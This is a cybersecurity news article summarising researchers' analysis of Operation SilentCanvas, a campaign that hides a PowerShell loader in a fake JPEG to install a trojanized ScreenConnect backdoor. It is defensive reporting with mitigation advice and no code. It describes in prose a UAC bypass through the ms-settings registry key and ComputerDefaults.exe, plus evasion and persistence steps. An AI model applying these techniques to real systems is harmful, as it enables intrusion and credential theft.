Hackers Deploy Trojanized ScreenConnect via Malicious JPEG

A sophisticated new cyberattack campaign, dubbed Operation SilentCanvas, is actively targeting Windows systems. The operation employs a deceptive tactic: it tricks victims into executing a malicious PowerShell script disguised as a harmless JPEG image file. Once deployed, this covert script installs dangerous malware, granting attackers full and silent control over the compromised machine. Security researchers have released a detailed report outlining this threat.

The attack begins when a victim receives what appears to be a routine image file called sysupdate.jpeg through a phishing email, a fake software update prompt, or a deceptive file-sharing link.

Despite carrying a .jpeg extension, the file contains no actual image data. Instead, it holds a PowerShell script engineered to quietly set up a staging environment and pull down additional malicious components from attacker-controlled servers.

Researchers at Cyfirma identified and analyzed the full attack chain, revealing just how deep the intrusion goes once the file is opened. The campaign does not rely on a single trick but chains together multiple advanced techniques to avoid detection and maintain a firm foothold inside targeted environments.

Once the initial file runs, the malware downloads a trojanized version of ConnectWise ScreenConnect, a legitimate remote access tool widely used across enterprise networks. The altered version gives attackers a persistent hidden back door while appearing to blend in with trusted software already present on the system.

The threat also gains elevated privileges without triggering any visible security warning. It does this through a fileless technique that manipulates a Windows registry path and abuses a trusted Windows binary to silently bypass the standard User Account Control prompt.

How the Weaponized JPEG Deploys the Malware

The sysupdate.jpeg file lacks the standard image header that all real JPEG files carry. When a victim opens it, Windows does not flag it as a script because the extension mimics an image.

The embedded PowerShell code creates a hidden folder at C:Systems and downloads a trojanized ScreenConnect package from legitserver.theworkpc[.]com over TCP port 5443.

To avoid antivirus detection, the malware reconstructs dangerous command strings at runtime rather than writing them plainly in the file. It also downloads a secondary payload named access.jpeg and runs it directly in memory, so no suspicious executable touches the disk.

Microsoft’s own .NET compiler, csc.exe, then builds a custom launcher named uds.exe directly on the victim machine, giving each compiled binary a unique fingerprint that defeats signature-based scanning.

The multi-Stage infection chain shows the end-to-end attack workflow beginning with social engineering and weaponized JPEG delivery, followed by PowerShell payload execution, AMSI bypass, and trojanized ScreenConnect deployment.

After the launcher runs, the malware hijacks a registry key tied to the ms-settings protocol and redirects it toward uds.exe. It then triggers ComputerDefaults.exe, a trusted Windows binary that auto-elevates, causing the payload to run with full administrator rights and no visible prompt. The registry key enabling this bypass is deleted within two seconds, destroying evidence before any investigator can find it.

Post-Compromise Capabilities and Persistence

Once the trojanized ScreenConnect framework is active, the attacker gains remarkable control over the infected machine. The modified software supports real-time screen monitoring, video recording, microphone capture, clipboard interception, keystroke logging, and silent file transfers through an encrypted channel designed to block network inspection.

The hex-level static analysis of the weaponized sysupdate.jpeg payload shows the embedded PowerShell staging logic and malicious infrastructure references.

The malware creates a hidden desktop environment operating out of the logged-in user’s view, allowing the attacker to run tools without detection. A persistent Windows service named OneDriveServers keeps the malware alive across reboots.

A separate component intercepts usernames and passwords at the Windows login screen before they reach the authentication system, and hidden local administrator accounts can be created for long-term access.

Security teams are advised to block or closely monitor execution of commonly abused Windows binaries including csc.exe, cvtres.exe, and ComputerDefaults.exe. Organizations should enforce strict controls over remote access platforms, deploy detection rules for suspicious PowerShell behavior, and isolate any system showing unexpected ScreenConnect activity. Credential resets for all privileged accounts are strongly recommended following any suspected exposure.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.